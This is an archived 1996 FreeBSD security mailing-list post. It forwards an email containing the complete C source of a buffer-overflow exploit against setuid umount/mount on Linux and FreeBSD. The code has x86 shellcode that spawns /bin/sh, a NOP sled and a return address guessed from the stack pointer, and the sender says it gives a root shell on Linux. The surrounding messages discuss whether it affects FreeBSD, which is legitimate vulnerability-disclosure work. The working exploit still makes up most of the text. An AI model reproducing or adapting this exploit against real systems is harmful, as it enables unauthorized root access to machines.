Date: Fri, 23 Aug 1996 11:11:23 -0700 From: Julian Elischer <julian@whistle.com> To: security@freebsd.org Subject: [Fwd: mount bug..] Message-ID: <321DF44B.6201DD56@whistle.com>
next in thread | raw e-mail | index | archive | help
This is a multi-part message in MIME format.
--------------63DECDAD62319AC452BFA1D7
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
This doesn't work, but I'm wondering why it says it's for freeBSD..
did it work on an earlier version? (even with bin replaced by sbin)
umount is not suid anyhow, but.....
does anyone know about this?
julian
--------------63DECDAD62319AC452BFA1D7
Content-Type: message/rfc822
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Return-Path: adrian@wisdom.psinet.net.au
Received: from whistle.com (whistle.whistle.com [207.76.205.131]) by alpo.whistle.com (8.7.5/8.7.3) with ESMTP id SAA17858 for <julian@alpo.whistle.com>; Thu, 22 Aug 1996 18:50:59 -0700 (PDT)
Received: (from smap@localhost) by whistle.com (8.7.5/8.6.12) id SAA02009 for <julian@whistle.com>; Thu, 22 Aug 1996 18:50:59 -0700 (PDT)
Received: from gatekeeper.whistle.com(207.76.204.2) by whistle.com via smap (V1.3)
id sma002007; Thu Aug 22 18:50:41 1996
Received: (from smap@localhost) by gatekeeper.whistle.com (8.7.5/8.6.12) id SAA12120 for <julian@whistle.com>; Thu, 22 Aug 1996 18:50:41 -0700 (PDT)
Received: from wisdom.psinet.net.au(203.19.29.2) by gatekeeper.whistle.com via smap (V1.3)
id sma012118; Thu Aug 22 18:50:17 1996
Received: (from adrian@localhost) by wisdom.psinet.net.au (8.7/8.7) id JAA16860; Fri, 23 Aug 1996 09:52:16 +0800
From: Adrian Chadd <adrian@wisdom.psinet.net.au>
Message-Id: <199608230152.JAA16860@wisdom.psinet.net.au>
Subject: mount bug..
To: digger@omen.com.au, julian@whistle.com
Date: Fri, 23 Aug 1996 09:52:16 +0800 (WST)
X-Mailer: ELM [version 2.4 PL24]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Here is the source to try out on your system:
/* Mount Exploit for Linux/FreeBSD, Jul 30 1996
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::""`````""::::::""`````""::"```":::'"```'.g$$S$' `````````"":::::::::
:::::'.g#S$$"$$S#n. .g#S$$"$$S#n. $$$S#s s#S$$$ $$$$S". $$$$$$"$$S#n.`::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ .g#S$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ gggggg $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::::`S$$$$s$$$$S' `S$$$$s$$$$S' `S$$$$s$$$$S' $$$$$$$ $$$$$$ $$$$$$ ::::::
:::::::...........:::...........:::...........::.......:......:.......::::::
:::::::::::::::::::::::::::::::::::::::::::::::;::::::::::::::::::::::::::::
Discovered and Coded by Bloodmask & Vio
Covin 1996
*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>
#define PATH_MOUNT "/bin/umount"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50
u_long get_esp()
{
__asm__("movl %esp, %eax");
}
main(int argc, char **argv)
{
u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
int i;
int ofs = DEFAULT_OFFSET;
buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
/* fill start of buffer with nops */
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
/* stick asm code into the buffer */
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;
(void)alarm((u_int)0);
printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n");
execl(PATH_MOUNT, "mount", buff, NULL);
}
Bsically it gives you a root shell.. might want to take a look at it.
It works in Linux.. I don't have a freebsd system to try it out on at the
moment however.
Adrian Chadd
<adrian@psinet.net.au>
--------------63DECDAD62319AC452BFA1D7--
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?321DF44B.6201DD56>